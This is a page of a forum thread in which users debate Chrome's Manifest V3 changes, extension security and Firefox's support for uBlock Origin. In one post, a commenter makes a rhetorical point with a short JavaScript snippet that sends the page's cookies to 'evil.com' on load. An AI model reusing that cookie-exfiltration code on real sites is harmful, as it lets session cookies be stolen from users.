Earlier quoted context omitted.
>So you're saying that because Google didn't completely up-end the security model and break almost every extension in the one-go, we should have no-progress towards a more secure extension model? A funny argument to make because the thing that would make such a measure ridiculous as you rightly point out, is exactly what already makes the Manifest changes ridiculous in the first instance. They were making a rhetorica…
I think a big step forward, towards a better security model, was overall a good thing, even if it meant that a good extension no longer had unfettered access to everything your browser saw. I don't think this change is ridiculous at all. And I don't want them to stop here either! v4 should close more of the avenues that malicious extensions are abusing! Extensions should declare everything up-front, so it's easy see…
Firefox is now the last major browser that still supports uBlock Origin
371–380 of 752 posts
Re: Firefox is now the last major browser that still supports uBlock Origin
#372Earlier quoted context omitted.
Long dead. Now there is no XUL, only (private user) data (that Mozilla sells for revenue)
I think they're making a Ghostbusters joke, btw
Re: Firefox is now the last major browser that still supports uBlock Origin
#373Earlier quoted context omitted.
> banners that say "our website does not work with your browser, please switch to Chrome" Which in practice means "switch to using a Firefox extension which fakes looking like Chrome, and just to selected shitty sites like ours".
Which in practice would only be executed by the same crowd of people who would have opted-in to the security features on the first pass.
Re: Firefox is now the last major browser that still supports uBlock Origin
#374Earlier quoted context omitted.
I didn't know who Charlie Kirk was, and no facts about DHH other than him being Rails creator. "will never be awesome" is missing some quantifier about US-centricity.
> US-centricity Andreas Kling is Swedish, DHH is Danish, fascism originated in Europe.
Re: Firefox is now the last major browser that still supports uBlock Origin
#375Earlier quoted context omitted.
... But they do that. The declaration is written in a language called JavaScript.
Javascript is not a declarative language.
Here's how you can write a declaration that you want to exfiltrate cookies:
document.addEventListener("load", function(){
fetch("http://evil.com/"+document.cookie);
});Re: Firefox is now the last major browser that still supports uBlock Origin
#376Earlier quoted context omitted.
The purpose of browser extensions is to build up an install base then sell out to some corporation that then promptly leverages that user base to exfiltrate data and monetize it. No thanks. They should have to declare to the browser what it is they want done instead.
Bro, they have to declare there Firefox's policy. What the heck are you doing? Hallucinating claim after claim to support your weak defense. Just stop
The argument has nothing at all to do with declaring permissions in a manifest.
Re: Firefox is now the last major browser that still supports uBlock Origin
#377Earlier quoted context omitted.
the obvious thing to do is keep using firefox as your daily driver, and load up the other browser as needed for the video etc. I'm being tongue-in-cheek here because it seems most people just give up on safari/firefox if one thing doesn't work and go to some chromium-based browser as their default driver. That's sad.
What you say is what I do, Firefox is open all the time, I switch to brave or edge if ff won't load something. I use adnauseam as adblocker. I have never had chrome on windows 10 or 11; nor chromium. For a year chase.com wouldn't allow me to login from Firefox. Dumb.
Re: Firefox is now the last major browser that still supports uBlock Origin
#378Re: Firefox is now the last major browser that still supports uBlock Origin
#379Earlier quoted context omitted.
It was killed by a lawsuit, mostly. Also FE devs using all new Chrome shinny APIs, and their Electron junk are also to blame, and they aren't going to throw their toys away.
If nothing else, I really do hope that the greater AI usage leads to more adoption (and hopefully interest) of native frameworks.
Re: Firefox is now the last major browser that still supports uBlock Origin
#380Earlier quoted context omitted.
> Then they had to make up some reasons to justify that Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good. It's just that uBlock Origin is so insanely useful, important and trusted, it should get full access to the entire browser regardless. Honestly, it should…
> Hate to be the one to defend Google here, but the reasons weren't that unreasonable. I want my browser to prevent random extensions from directly reading web page data. The declarative API idea is pretty good. Don't kid yourself, even with mv3 if you install a rogue extension it's going to have access to a lot more data than you would be comfortable sharing to.